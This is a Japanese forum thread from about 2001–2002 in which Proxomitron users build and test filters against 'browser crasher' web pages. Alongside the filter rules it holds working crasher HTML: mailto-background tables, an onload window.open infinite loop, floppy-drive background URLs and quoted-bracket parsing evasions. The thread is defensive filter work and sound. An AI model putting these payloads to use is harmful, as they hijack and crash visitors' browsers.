>>184 自分の漢度に挑戦してみましたが、あえなく撃沈しました(w
>>183 強烈!
ここまで来ると芸術的にも思われる (ワラ
187 :
184 :01/11/14 02:13 ID:???
「GOROYA」 じゃなかった。 正しくは「Groya」(「グロ厭」から来てるらしい)
188 :
名無しさん@お腹いっぱい。 :01/11/14 02:16 ID:fxh7XS02
さすがのオミトロンもグロ画像フィルターは無いからね。 併用すると便利だよ。 グロ画像も一種のブラクラみたいなものだから。 オミトロンと関係ないのでsageます。 ageてすみません。
グロ画像には低速回線で対抗。 上からだんだん表示されるのを見ながらヤバイと思ったら閉じる。 全体がだんだんハッキリ表示されてゆく方式でも有効。
aborn filterを使う ↓ ブラクラ、グロ画像、広告のアドレス登録 ↓ 偽あぼーん ↓ (゚д゚)ウマー
>>192 thx.2ch用フィルタがたくさんあって助かった。
subbackから「掲示板に戻る」が欲しかったんよ〜
194 :
名無しさん@お腹いっぱい。 :01/11/14 23:59 ID:9vnpB+QS
>>195 >>192 ああ、このスレッドには神が数名いらっしゃるようですね。
ギコらなくなりました。多謝!
197 :
名無しさん@お腹いっぱい。 :01/11/16 10:24 ID:DdHGRcA/
199 :
名無しさん@お腹いっぱい。 :01/11/16 15:49 ID:h7eagG4V
もろブラクラ。 全部防いだけど。
202 :
200 :01/11/16 18:56 ID:???
>>201 食らったわ。さっき踏んだ時はキャッシュが残ってたみたい・・(-_-)
>>206 バージョンがN40じゃないとか?
それかちゃんとセキュリティを考えてプレフィクスの設定してるか(だったら性格悪い)
ガタガタ言う、って聞くと、 「ケツの穴に手ぇ突っ込んで奥歯ガタガタ言わしたろか?」 と言うのを思い出す。
プレフィクス設定するくらいなら、ファイアウォールソフトでproxomitron.exeへの外部から の接続を不可にしたほうがよいと思われ。
しまったケツの穴からだった。激しく無関係でスマソ
くだらねえ
>>209 プレフィクスの設定しなかったら
>>203 みたいなURLを
<iframe>とか転送とかされるとやばくない?
内部から外部へアクセスさせるようなものだから
ファイアウォールとは関係ないと思うけど。。?
213 :
209 :01/11/17 07:58 ID:???
それはあるな。でもこれについては「あちらを立てればこちらが立たず」だし。
プレフィクスを無効にして、FWでオミトロンへのアクセスをブロックしてます。
215 :
209 :01/11/17 11:50 ID:???
>>214 それがベターな選択だな。
>>212 のような弊害もあるけど、そのようなケースはレアだしむしろProxomitron使ってるこ
とで自分のマシンを踏み台にされるのがよほど怖い。そもそもこのソフトは自分をサーバ
にして動かすからね。当然それなりの対策は必要ってわけだ。
俺はファイアウォールソフトにTinyPersonalFirewall使ってるけど、こいつは優れもので自
分のマシンからはサーバとして動かすことができても外部からは一切のパケットをシャッ
トアウトするようにできる。そのためproxomitron.exeへの外部からのアクセスを排除すれ
ば外部には自分のマシンがプロキシサーバとして認識されなくなるし、当然踏み台にされ
る危険性も少なくなる。無論プレフィクスの設定も不要になるわけだ。
217 :
209 :01/11/17 12:53 ID:???
>>216 それだけでは不十分。
実際TPFがproxomitron.exeにたいして外部からのアクセスがあったというダイアログを表
示してビビったことがあったからね。
>>217 そりゃ、アクセスされることはあるじゃない?
そのあと、proxomitronがアクセスを拒否するのでは?
>>217 それは単にアクセスがあっただけで、実際にはProxomitronを外部から使用したわけじゃないでしょ?
アクセスがあればファイアウォールソフトが検知するのは当たり前です。
それと、プレフィクスを設定しないことに執着する意味は何でしょうか?
利便性のためとかだったら、笑えますが。
220 :
209 :01/11/17 13:05 ID:???
>>219 >それと、プレフィクスを設定しないことに執着する意味は何でしょうか?
>利便性のためとかだったら、笑えますが。
それや。
>>220 そうですか。そんな簡単なことをする労苦を厭う
あなたがファイアウォールを使うというのはちょっとおもしろいです。
222 :
名無しさん@お腹いっぱい。 :01/11/17 21:37 ID:hxZetuXp
225 :
山師さん :01/11/18 15:09 ID:IerVzxYV
X-Forwarded-ForとForwardedはどうしてます? なんか適当なアドレス入れてます?空欄の方がいいのかな。
228 :
227 :01/11/18 23:00 ID:???
229です ちなみに20秒ほど(Celeron300MHzで)待てば、 Kill Excessively Nested Tablesフィルタを 使っててもそのページは表示されます。 (常用できない遅さですね)
231 :
227 :01/11/19 22:39 ID:???
ありがとうございました、うまくいきました。 ところで229さんのフィルタを入れとけば ほかのを入れなくてもブラクラ防げるんですよね?
>>231 遅レスすんません、
一応思いつくものは防ぐようにしてありますが、過信したらだめだと思います。
特にJavaScriptとかを使うといろいろできるんで。
233 :
名無しさん@お腹いっぱい。 :01/11/22 21:48 ID:EX4XmM7/
ブラクラ募集age
234 :
名無しさん@お腹いっぱい。 :01/11/25 23:58 ID:eIkQBACU
ブラクラ大募集!
235 :
名無しさん@お腹いっぱい。 :01/11/26 01:05 ID:uOl5BXCJ
あんまり2chにブラクラのリンクをはる人がいなくなったからなぁ。。 2ゲッターが今のブームか(わら
236 :
ソースおもろい :01/11/26 01:24 ID:SMN3e0e5
237 :
名無しさん@お腹いっぱい。 :01/11/26 08:51 ID:u9WSSlle
>>237 そこ、VirusScanにトロイって言われたよ。
238 :
名無しさん@お腹いっぱい。 :01/11/26 10:17 ID:Dc/1i7x/
隊長、今から突撃します!!
240 :
名無しさん@お腹いっぱい。 :01/11/26 12:10 ID:0pu654mJ
無事、帰還しました。
オミトロン、マンセー!!!
>>237 どこら辺がトロイ?
241 :
237 :01/11/26 12:52 ID:???
>>240 どこら辺がって?
VirusScanにそういわれただけだよ。
もう削除したけど、ログ残ってる↓
2001/11/26 午前 08:49 Trojan NT AUTHORITY\SYSTEM D:\WINNT\TEMPORARY INTERNET FILES\Content.IE5\Q1AZCJOZ\che[1].htm.vir Exploit-Nocnoc (このウイルスは駆除できません。)
ガ━━━(゚Д゚;)━━━ン!
244 :
237 :01/11/26 17:12 ID:???
>>243 知らないって。VirusScanにそう言われただけなんだし。ログ読めない?
>243 もし勇気とか好奇心とか向学心があるなら、 バイパスしてみ。
246 :
:01/11/26 19:28 ID:L5Zxyzl9
>>236 にバイパスで行ってみた。汗
脳豚さん(2001)は何も言わなかった。
247 :
名無しさん@お腹いっぱい。 :01/11/27 07:12 ID:93avvY+8
>>244 お前バカ?
自分で判断できねえ奴が偉そうに書くな。
249 :
名無しさん@お腹いっぱい。 :01/11/27 23:47 ID:Zwubtu0l
恒例の ブラクラ募集!!
ブラクラしたいならハード叩け
>>244 はソース見ても何も分からない厨房だから相手にしてもしょうがない。
曰く
>トロイって言われたよ
>そういわれただけだよ
>知らないって
>そう言われただけなんだし
どうしようもない奴だな。
>>253 ウィルスとして検出されるってことはどうなのよ?
>>254 誤検出だろ。
現にこうやって書き込んでるし、ソース見てもそれらしものは無かったよ。
257 :
名無しさん@お腹いっぱい。 :01/11/28 23:49 ID:wq6ibgil
テレホの時間です。 ブラクラ募集!! オミトロンを倒すのは誰だ!!
260 :
名無しさん@お腹いっぱい。 :01/11/29 01:30 ID:KhpfYly6
>>260 設定>アクセスで
「URL ベースの Proxomitron コマンドを無効にする」
がOnになってるか接頭語を設定してたりしないかい?
>>260 Naoko4正式版のDefault.cfgは、"Disable URL based Proxomitron
commands" がデフォルトで有効。その為に、"src.." や "bypass.." などが
使えません。
これを使えるようにするためには、"Config -> Access" からこのチェックを
外す必要がある。同時にプレフィクスも設定した方がいいと思います。
Count_bさんのWebぺーじにも書かれてます。
263 :
名無しさん@お腹いっぱい。 :01/12/02 00:34 ID:lxzKTB2x
オミトロン最強ということで結論が出ました。
264 :
名無しさん@お腹いっぱい。 :01/12/03 20:23 ID:WUiHIKEZ
↑喜んで貼りまくる厨房
↑
そういうスレなんだよ、ボケ!
ブラクラで荒らすのは大歓迎!!!
けど
>>264 のリンク先って何?
>>266 ブラクラの作り方みたいな内容だった。
あのURL自体はブラクラではない。
最近ブラクラ少なくないか? 半角板ですら見かけないし。
269 :
名無しさん@お腹いっぱい。 :01/12/04 18:22 ID:tvH9rhZd
まさかブラクラ絶滅の危機?
通常閲覧に支障のないブラクラフィルタっていうのはどうかな? Anti-Auto-Refresherとか。
>>271 ってか、どのフィルタも特に支障はないべ
駄スレだから下げるよ
275 :
名無しさん@お腹いっぱい。 :01/12/06 16:45 ID:AX+5eqgz
>本人はブラクラと認識してないけど、 ワラタ でも、全然ブラクラじゃないよ。
276 :
名無しさん@お腹いっぱい。 :01/12/06 17:13 ID:mJyhih/4
オミトロンが壊れる位のブラクラって無いのかよ
なんかInternet サムライにしてからブラクラ踏まなくなった(w
踏まないんじゃつまらん、踏んでオミトロンで 殺す所が醍醐味なんだから
>>277 金出してサムライ買う奴はアホ。
プロジー社員でも買わん。
>>279 プロジー社員はその分給料から引かれています(ワラ
281 :
名無しさん@お腹いっぱい。 :01/12/10 13:42 ID:6eNebxMl
282 :
名無しさん@お腹いっぱい。 :01/12/10 13:42 ID:6eNebxMl
2重投稿してしまった…。スマソ。
>>283 具体的にそのブラクラのURLを示して。
287 :
281 :01/12/10 21:17 ID:???
こういうのをつけて、TABLEダグを使うと出ます。
<STYLE>TABLE{background:url(mailto:
[email protected] );}</STYLE>
>>287 だったらその危険な部分をマッチさせればいいだけでは?
とりあえず作ってみては? このスレの住人はブラクラに飢えてます(w
>>289 どこかにあぷするのめんどくさいから・・・。
<html><body>
<table style="background:url(mailto:
[email protected] );"><tr><td>test</td></tr></table>
<table style="background:url(mailto:
[email protected] );"><tr><td>test</td></tr></table>
<table style="background:url(mailto:
[email protected] );"><tr><td>test</td></tr></table>
<table style="background:url(mailto:
[email protected] );"><tr><td>test</td></tr></table>
</body></html>
わーお! ブラクラボンバー発動! style=の後もチェックするべきか
あ、でも外部CSSに書かれてたら意味ないなぁ。。
隊長、無事帰還しました!! Aドライブにアクセスするブラクラでした。 オミトロン様がきっちり処理してくれました。 オオミトロンマンセー!!
>>290 見事ですね。
これは引っ掛かりました。
297 :
そろそろテレホ(ブラクラ募集の時間) :01/12/12 22:35 ID:KoB5IfDc
さあ、世界中のブラクラ作者よ!
早速
>>290 を使ったブラクラを作って、オミトロンユーザーを楽しませよう。
298 :
名無しさん@お腹いっぱい。 :01/12/13 01:38 ID:ZHnr1QYl
<body nobak="
http://Local.ptron/black.gif " bgcolor="#000000" text="#FF0000" link="#FF8040" vlink="#FF8040" alink="#FFFFFF"
onload="var i=0;while(1){open('crush!.html',i++);}">
300 :
名無しさん@お腹いっぱい。 :01/12/14 00:03 ID:k/UjoxQp
>>33 のForのほう使うと、スレ一覧の下の方のスレ(新しくウインドウが開く)すべてに”For-Loop Javascript found!”ってなるんだけど、うちだけ?
301 :
300 :01/12/14 01:07 ID:k/UjoxQp
過去ログ漁って、URLマッチに^(*.2ch.net/)を追加したら大丈夫になった。
Kill Often Seen Browser Crusher (2001/11/16) Kill External Script (2001/11/14) この2つを入れたらサイトによっては凄く表示が遅くなるけど、 そういうもん?
>>302 Oftenは古いバージョンですね。Kill Browser Crusher (2001/12/11)
に変更されてますよ。
>この2つを入れたらサイトによっては凄く表示が遅くなるけど、
>そういうもん?
特に重いとは感じないけど?
>>302 ども。そのフィルタを書いた人です。
Kill Excessively Nested Tables (2001/11/17)が原因だと思います。
すべての<table>タグにマッチしてしまうからです。
あまり見かけないのではずしておくといいかと思います。
306 :
名無しさん@お腹いっぱい。 :01/12/15 20:33 ID:iltPxDS1
>>307 それはブラクラじゃないような。。
Image Checker使えばいいよ。
どこかのオミトロンスレにあったと思う。
>>309 Image Checkerで防げました。
311 :
不明なデバイスさん :01/12/17 18:31 ID:2rEjbCE6
>>310 ちゃんと防げてるとどのようになりますか?
俺の場合は「0」が出ているだけでソース見ても「0」だけなんですが
これは撃墜しているってことですか?
>>311 なんかこのページの管理人がすり替え済みらしい
314 :
不明なデバイスさん :01/12/17 19:11 ID:2rEjbCE6
>>313 html content found!
・・・と出ますね。
404だよ
>>318 URL Killfile.txtに登録
320 :
名無しさん :01/12/18 02:11 ID:R/gAdHcw
攻撃を受けている今こそ、このスレの存在が重要なんだage  ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ∧_∧ age (・∀・ ∩ age (つ 丿 ( ヽノ し(_)
321 :
名無しさん@お腹いっぱい。 :01/12/18 02:13 ID:R/gAdHcw
非常時の今はこのスレはage進行でヨロシク 2ちゃんにオミトロンを普及させるんだ!! ★★ 口◇口口☆ ■ age!! □ ☆口口◎口 ∋0ノハヽ0∈ 口 ▽ ▼ ◎ ( ´D`) ○ 口 / | ▼ ○ 〜(,_,,ノ  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
323 :
BACKGROUNDも要チェック :01/12/18 14:17 ID:lyCSWj7g
ほれ。 <Table border> <TR> <TH BACKGROUND="a:hoge1.jpg">ブ</TH> <TH BACKGROUND="a:hoge2.jpg">ラ</TH> <TH BACKGROUND="a:hoge3.jpg">ク</TH> <TH BACKGROUND="a:hoge4.jpg">ラ</TH> </TR> <TR> <TH BACKGROUND="mailto:hoge1">ぶ</TH> <TH BACKGROUND="mailto:hoge2">ら</TH> <TH BACKGROUND="mailto:hoge3">く</TH> <TH BACKGROUND="mailto:hoge4">ら</TH> </TR> </Table>
いろいろ検索してみたのですが、 厨房なのでProxomitronを使いこなせないで困っています。 どこかに使用法などが詳しく説明されているサイトはありますでしょうか? 「逝ってよし」とはくれぐれも言わないでください。 よろしくお願いします。あと茶化すのもやめて下さいYO(願)
>>325 まず、Windows板のProxomitronスレをご覧になればよろしい。
Windows板にもあったのですね。 ありがとうございます。 見に行ってきます。
オミトロン使う以上。これからは…厨房なので、初心者なので。 等と言う言葉は慎むべきだと思うが。どうよ。
人それぞれ。
>>324 そう。
でも何処にもお目にかからない。
330 :
禿同 :01/12/18 17:20 ID:088sCGVN
>>ブラクラ対策ページ管理人様 ブラクラ対策ページでImage Checkerも扱っていただけるとうれしいです。 あと、各フィルタの動作説明もしてほしいです。よろしくお願いします。
>>332 Image Checkerは、Proxmineさん作のフィルターだから、tocさんの
ページで勝手に公開する事は出来ないんじゃない?
>>333 Proxmineさんとこのページにリンク貼る形にすれば
問題ないんじゃ?
>>333-334 Image CheckerはProxomitron-Jのcount_bさんの作品です。
私は其れに手を加えたものをImage Checker [P]として書きこんだだけです。
尚、count_bさんの作品は無断での転載を禁じられています。
隊長、無事帰還しました!! なんかよく分かりませんが、Protocol Src Killerがいっぱい作動しました。 オミトロン様がきっちり処理してくれました。 なかなか終わらないので、途中で中止しました。 (多すぎるとバイト数の関係でヤバいのかな?) オオミトロンマンセー!!
>>335 フォローどうも>Proxmineさん<オリジナルは、count_bさんだったんで
すね。Image Checker [P]を使っているので、失念してました。
>>336 全て撃墜しました!!
おみとろんマンセー!!
341 :
勝負だ! :01/12/28 16:45 ID:SxP0exRD
342 :
不明なデバイスさん :01/12/28 16:48 ID:DzOjv08R
>341 二つ目はどのフィルタを効かすの?
>>341 最初のURLは既出ですね。
>>171 で対策されてました。
後のほうは、途中で読み込めなく(?)なりました。
おいらも
>>341 の二つ目はダメだす・・・。
一応ブラクラ用フィルタはほとんど全て入れてるつもりだけど
なんででしょ?
347 :
名無しさん@お腹いっぱい。 :01/12/29 04:56 ID:7a4ncaZn
フィルタでガードは限度があるからいっそハンドラを潰す方法というのを知りたい
348 :
名無しさん@お腹いっぱい。 :01/12/29 05:32 ID:pI6OQ0HI
fake=">"とはよく考えたもんだ
349 :
347 :01/12/29 05:36 ID:???
ハンドラを潰すのわかったけどスマートじゃないな 不必要なプロトコル全部にやるのも面倒だし
350 :
347 :01/12/29 06:03 ID:???
っていうかそう言う問題じゃないんだったぁ〜
>>341 の2つ目だけど、落ちなきゃいいと思う。
途中で読み込むのが遅くなったので中止したけど。
http://toc.dyndns.org/t/bc/Anti_Browser_Crusher.zip (3,695 Bytes)
新しいバージョンのフィルタを作ってみました。
Kill Quoted Right Bracket (2001/12/28)です。
誤爆してほかのまっとうなタグまで置き換えてしまうかもしれませんが、
そのときはご報告いただければまた考えてみたいと思います。
\0\1\2\3とか無意味に使ってますが気になる方は適当になおしてくださいませ。
(今後のバージョンアップの布石と見せかけて単にめんどくさくてそのままに
してるだけだったり。。)
あ、前のフィルタと同じ名前なのでプロクシ経由の場合は ファイルサイズに気をつけて、最新のものかどうか確認してください。
◆toc/CX1gさんありがとうございます。☆⌒(*^-°)v Thanks!! 更新させていただきました。バグとかがあればご報告させていただきます。
>>353 のフィルター入れてから、
>>341 の2つ目のURL踏んだら、OEが立ち上がって
ニュースグループ購読する画面出て焦った…(^_^;)
357 :
名無しさん@お腹いっぱい。 :01/12/29 15:46 ID:6koYprkP
ハンドラも潰さず、ブラウザのJavaScript設定もすべてONにした状態で プロキソミトロンだけで制御しようという野望には、やはり無理があるのか…
http://toc.dyndns.org/t/bc/Anti_Browser_Crusher.zip (3,827 Bytes)
Kill Browser Crusher (2001/12/28)で、
JavaScriptのgo,openやHTMLタグのbackground属性での
変なプロトコルの使用を禁止するように変更しました。
>>357 正規表現が使えるんだから無理なことはあんまりないと思いますよ?
対応できてないブラクラはたぶんこちらが正規表現をうまく
使いこなせてないとか作る時間がないとかProxomitronの
正規表現にちょっとくせがあるからとかだと思う。
あ、フィルタの日付間違えてる。。
新しいのは 3,823 Bytes になりました。
ところで、ブラクラマニアのみなさんはたぶん
Image Checkerフィルタを使っているかと思いますが、
HTMLをほかの拡張子で偽装することって、とくに画像ファイルの
それを使うとは限らないと思います。
aviとかmpgとかpdfとかなんでもありですよね?
そういうものにも対策をとろうとすると、かなりCPUパワーを
使うのでさすがにこれはProxomitronではやりたくないような。
ブラクラって最近そんなに見かけないのに、ふつーのMPEGファイル
(1MBytes以上がふつーで100MBytes以上もけっこうありますよね)
だった場合、ImageCheckerの2番目のフィルタを使ったら
全部読み込むまでにけっこう時間がかかりますよね。
ということで、
>>358 で無理なことはあんまりないといいつつ
やっぱふだんの使い心地とトレードオフで使ってないフィルタも
あるなぁと思いました。
>>358 のフィルター入れてから、
>>341 の2つ目のURL踏んだけど、今回はOE立ち上
がりもしなかった。
361 :
名無しさん@お腹いっぱい。 :01/12/29 18:55 ID:6koYprkP
Image Checkerって、IEじゃなければ関係ないですよね? ネスケやモジラだと、jpgでhtmlだと表示されませんよね?
どうやってもOEが立ち上がる・・・ フィルタが干渉してるのかな
ちゃんと効いた!
>>363 俺も。初心者だから何でなのかよく分からん。
>>358 そのフィルタ以外にも入れておかないといけないのがあるの?
yahooの別窓とOEが立ち上がるよ…
あれえ?前は効いてたのに今逝ってみたらOEが一つ立ち上がった・・・ よう分からんな・・・
>>366 > OEが立ち上がる
<META
http-equiv="REFRESH"
content="0.01; url=?ews://
[email protected] "
>
とりあえず、これが原因だということはわかったので、
少々おまちください。
> yahooの別窓
これは新しいバージョンだと出ないと思うんですが。。
>>366 > yahooの別窓
理由がわかりました。
iFrame/iLayer to linkフィルタを使っていますか?
使っていない場合はチェックしてみてください。
>>371 どんどん強くなるね。
無敵のフィルタが出来そうだ。
ここらへんで、入れてるフィルタを公開しあって最強のフィルタつくらない?
とりあえず、<iframe><ilayer>が多すぎる場合にも対応しました。(4,040 Bytes) 例のサイトは2つしか含まれず、とくに害はないのでこの変更による反応はしません。
376 :
プロ厨 :01/12/29 20:12 ID:???
>>376 " ((^http(s|):)\1|(http(s|)://[^/]++:[0-9]++*)\1)"
たんに9文字までしかマッチしないからでは?(w
>>378 です。勘違いしてました。すんません。
私の書いたフィルタだとhttp(s|):以外のプロトコルはつぶせてるような。。
読みにくいですが、よかったら見てみてください。
あ、該当箇所は (^http(s|)://[^/:]++/)[0-9a-z._ ]++{1,10}: です。 なんだか調子にのって書きこみまくってるように見えるので そろそろ名無しに戻ります。。
うーん、クォート済み閉じカッコをすべて排除するというのはどうもあまり 賛同できないので、それ以外での対処法を考えてるんですが、なかなかうまく いかないです。ぼくは難しいことを考えるのが苦手なので、複雑なパターンマッチ ではなくてほとんど関数にまかせてるんですけど、どうも$NEST()の挙動に 納得いかない点があります。下の例を見てください。 -- パターン -- Name = "Test" Active = TRUE Limit = 256 Match = "$NEST(<,\1,>)" Replace = "MATCHED = (\1)" -- 例文 -- <IMG src="foo.jpg" value=" たろう > こんにちわ " > <IMG src="foo.jpg" alt=" たろう > どうも〜 はなこ > こんにちわあ " > -- 評価結果 -- MATCHED = (IMG src="foo.jpg" alt=" たろう > こんにちわ " ) MATCHED = (IMG src="foo.jpg" alt=" たろう ) どうも〜 はなこ > こんにちわあ " > $NEST()はきちんとクオート済み右閉じカッコを配慮してくれるんですが クォート内に改行がまじるとアウトみたいです。この動作には納得が いきません。つーわけで、複雑なパターンでこれを回避するのは僕には 無理なんでわたしゃあきらめました。
>>381 まっとうなHTMLでなら>を使うべきなので問題ないと思うのですが。。
>>382 ですが、実体参照が。。
>のことです。<使うべき
>>381 > $NEST()はきちんとクオート済み右閉じカッコを配慮してくれるんですが
> クォート内に改行がまじるとアウトみたいです。
なるほどー。$AV()にもちょっとしたバグ(というか想定外だった?)が
あるみたいですし、最近のバージョンで実装された機能だから
まだ枯れてないのかな。けっこう内部では複雑な処理をしてるそうですし。Proxomitronの次のバージョンに期待してます。
ところでLinux/*BSD上でProxomitron使えてるかたいます?
どこかのスレでちらっと見かけたんだけど…。
(あるいは同様の機能を持つソフトでもいいんですが…。)
>>384 の後半
しまったここはブラクラ対抗スレですね。スレ違いスマソ。
>>373 ◆toc/CX1gさんにお願いなんですが、Kill Browser Crusherをいろんなブラクラ対策を統合したものじゃなくて
それぞれにわけたものにして欲しいです
おねげします
>> 382 <IMG src=" javascript: alert('Com'); if (Value > 5) { // <= この">" alert('FooBar'); } }"> ↑こういう場面で誤認するのが src="javascript: に対応しきれない という意味です。極力もとのHTMLを壊さない、というのを制作の1つの ポリシーにしているので、生のjavaソースがあふれるようでは…。
>>387 ていうかブラクラ相手に生のHTMLこわさないとかそんなことはどうでもいいことだと思うんだけど。
◆toc/CX1gさんにお礼を言おう。 ◆toc/CX1gさんを称えよう。 ありがとう。 マンセー!
あと、貴重なブラクラを作成してくれた
>>376 さんにも!
391 :
名無しさん@お腹いっぱい。 :01/12/30 22:51 ID:1Z4m8Fju
392 :
d :01/12/30 22:57 ID:???
/ | 先生! ∩∠ 踏んじゃったよ〜! ( ヽ | | | \\ /■\ .| | \_________ \\(´Д`; )ノ ノ||||||||||||||||||/ /:::: \ (  ̄ ̄ ̄ ̄/ /:::::: |ヽ、 \|||||||||||||/ /::::::::: / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ / /:::::::::::: ||||||||||||||||||||||||||||||||||||||| ̄|:::::::::::::: / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .| |:::::::::::::: |||||||||||||||||||||||||||||||||||||||||.| |::::::::::::::: ゚° 。 ;;'.;§ ,.' ,:l/■ノ|||||||||||||||||/ /:::: ,・; ;; (゚Д 。;;|,.:;§,.:. '.;  ̄ ̄/ /:::::: ,.',・; ;; |ヽ;."|.,.:. '.;§, |||||||||||||/ /::::::::: ,.',・; ;; ∩ ̄⊂',・; / /:::::::::::: ||||||||||||||||||||||||||||||||||||||| ̄|:::::::::::::: / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ .| |:::::::::::::: |||||||||||||||||||||||||||||||||||||||||.| |:::::::::::::::
>>391 OEを削除して、他のメーラーを使えば?
で、メーラーはOEを指定する。
俺は安全のためにそうしてるけど。
>>391 まず、本当にそれが最新版なのかを確認してね。
Kill Browser Crusher (2001/12/29r2)
つぎにフィルタの順番を確認。
Kill Quoted Right Bracket (2001/12/29)が
Kill Browser Crusher (2001/12/29r2)よりも上にきてますか?
それでもだめならソースを見たりデバッグモードでソースを見たりしましょう。
http:// (prefix)dbug..www.geocities.com/WallStreet/District/9379/iecrash.html
(prefix)は適当なものに置き換えて。
395 :
391 :01/12/31 04:36 ID:3xjyuz8E
>>393 うーん、それは最終手段にしたいです。
とりあえず、ほかの方が大丈夫なのになぜ自分のところだけダメなのか
つきとめたいです。
特になぜ2chのスレのmail:toが立ち上がってしまうのか。
>>394 ありがとうございます。tocさんのフィルタは問題ありませんでした。
Protocol Src Killerを別のものに入れなおしたら、
>>391 のサイトはOEが立ち上がらなくなりました。
でも2chや他サイトでmailtoから立ち上がっちゃうのかなー、と。
自分としては、Protocol Src Killerでどれを使っていいか不安なんです。
で、Proxmineさんのアップローダーをお借りして
最重要部分の、webフィルタの上の一番上の項目に置いてるフィルタを
あげてみました。もしお時間がよろしければ、私のフィルタを見て
「どれが機能的に重なっている、どれに不備がある」等を
アドバイスいただけないでしょうか?
今はあるもの全てを入れてオンにしてる状態なんです…
http://www23.tok2.com/home/Proxomitron/files/247.zip IE5.5sp2です。
(×)でも2chや他サイトでmailtoから立ち上がっちゃうのかなー、と。 (○)でも何故2chや他サイトでmailtoから立ち上がっちゃうのかなー、と。
>>395 Protocol src killer (2001/11/09)を残して後は消す。
>>395 後は消す
↑
(2001/11/09)以外のProtocol src killerを消すだからね。
399 :
391 :01/12/31 12:24 ID:3xjyuz8E
>>397-398 ありがとうございます。11/09の以外消しましたが、でも相変わらず一般サイトでmailtoはメーラーが立ち上がります。
もうどうしていいやら(´ー`)
>>399 クリックするからだろ。クリックするのヤメろ。
>>399 とりあえず、君のアップしたパターン一覧を参考にした。
ただ一言。
>>399 勝手に立ち上がるのと、自らの意思で立ち上げるのは違うぞ。
391さん Uploaderにフィルター上げてみたので、試してみて。 Image Checker [P] [08.07.2001](For IE)は、IE専用なんで注意してね。 σ(^^)の環境では、mailto問題無い。
書き忘れた。Uploaderの248.zipね。
Local File Access Killerってセキュリティーパッチで 対応済の人もいれた方がいいの?
>>405 FDDがいきなり音立てるのが防げますよ。Locla File Access Killer。
conconパッチ入れてたって、FDDにアクセスするのは防げないんじゃない?俺
はそう思って入れてるよ。
407 :
391 :01/12/31 16:13 ID:???
>>400-402 そういえば、全くそのとおりでありまして返す言葉もございません。
長々とスレを汚して大変失礼しましたー!
>>403 ご丁寧にサンクスです!
そのまま丸ごと使わせてもらいますー。
Kill Browser CrusherはLocal File Access Killerと protocol src killerを含んでいるので、 両方はずしてKill Browser Crusherだけにしても たぶん大丈夫なはずなんですが。。
>>408 なるほど。protocol src killer外したら
>>336 のブラクラもすぐに止まったよ。ありがとう!
>>409 ,411
順番の問題ですからね。> どちらのフィルタが先に適用されるか
413 :
名無しさん@お腹いっぱい。 :02/01/01 01:06 ID:v84HdQNr
お年玉にブラクラ頂戴。
>414 ご苦労さまです。
>>414 表示崩れてた掲示板の表示が問題無くなった。お疲れ様です>tocさん
<img invalid test="='='a=" test test='=>"=>a=' test test="=>'=>a=\" test src="mailto:1\" test> <hr title="t`es`t=">valid <a title="t'es't=" href="test.html">'valid link'</a> 正直、ここまでやるとProxomitronを意識してるとしか思えないですが、 ちょっと考えてみます。。(あきらめるかも) とりあえずじゃっかん誤爆するけどより安全な(?)バージョンです。 [Patterns] Name = "Kill Quoted Right Bracket (2002/01/02r1)" Active = TRUE Limit = 100 Match = "<*[a-z_]++="[^"'`]++(>|\?(x3e;|62(;|)))[^"'`]++"*>" "$SET(#=<font size=1 color=green>[Quoted Right Bracket Killed]</font>)" Replace = "\@"
すいません、いままでの全部実体参照までマッチさせてました。 (なんだかめちゃシンプルになってしまった。不安。。) ↓修正版 [Patterns] Name = "Kill Quoted Right Bracket (2002/01/02r2)" Active = TRUE Limit = 100 Match = "<*[a-z_]++="[^"'`]++>[^"'`]++"*>" "$SET(#=<font size=1 color=green>[Quoted Right Bracket Killed]</font>)" Replace = "\@"
>>419 BoundsはMatchといっしょなのでなくしちゃいました。
CPUパワー余計に使うのかな?
>>421 Kill Loop JavaScript(2001/11/14)で、防げるみたいですが?フィル
ターの作者はtocさんです。
>>423 アサーリ喰らったよ。フィルタの順番か。
>>424 今もう一度踏んだけど、やっぱ大丈夫なんで、多分そうだと思われ。
>>425 キャッシュが効いてたみたい。削除したら大丈夫だったよ。ありがとう。
キャッシュを見ずに最新のものを取得したい場合は Ctrl + F5 で更新するといいよ。(IEの場合)
>>387 を誤爆していたので、修正しました。。
(Boundsの指定とバイト制限を大きくしました。何度もすみません)
こんなの在った。 www79.sakura.ne.jp/~mesia/img/img-box/img20011226235534.jpg
>>429 Prifixを指定しておけば大丈夫のようですね。
toc氏にはぜひ今まで通りキャップつきで発言してほしい。 信用度が違う。
>>433 だいぶ変更しました。くわしくは readme.txt を読んでいただければと。。
ファイルサイズは 3,129 Bytes です。
各フィルタの説明も書いてみました。
>>434 大分、変更されましたね。フィルター数も増えてるし。
>>434 のリンク先も
重く無かったです。
またへんなのを思いついたので更新しました。(3,186 Bytes) <img fake="><" src="mailto:1"> <hr> <img fake="><>" test="<" src="mailto:1"> <hr> <img fake="<><" test="><><" foo="><>" src="mailto:1"> こういうのにも対応しました。ただし、 <img fake="><\" src="mailto:1\"> のように「\"」を使われるとタグをこわします。 ($AV()のバグと根は同じだと思う。)
>>437 今落としました、早速使ってみます。ありがとう!
439 :
438 :02/01/04 16:31 ID:99gnmv5C
>>437 入れてみたんですが、デフォルトで7個のフィルターの内
Kill Loop JavaScript(2001/01/04)だけAllow〜にチェックが
入っていて他のにはチェック付いてませんが、残りの6個のフィルター
は、Allow〜にチェックを入れない方がいいですか?
>>439 はい。Kill Loop JavaScriptはループを無効にするだけで、
さらに置換後のJavaScript内に意図しないコードが含まれているかも
しれませんので、それはほかのフィルタにやってもらおうということです。
それ以外のフィルタはマッチしたらほかのフィルタがマッチしても
意味がないのでチェックは入れません。
441 :
438 :02/01/04 17:15 ID:???
ちと古いけど
>>299 を潰すのはiFrame/iLayer to linkだけ?
なんか、えらくKill Quoted Right Bracketが誤爆するようになった。
>>443 ウイルス。Nortonが珍しく働きました
>>444 どんなページか書いてもらえると対策が取れるんですが。。
>>444 あと、Kill Quoted Right BracketはKill Quoted Meta Characterに
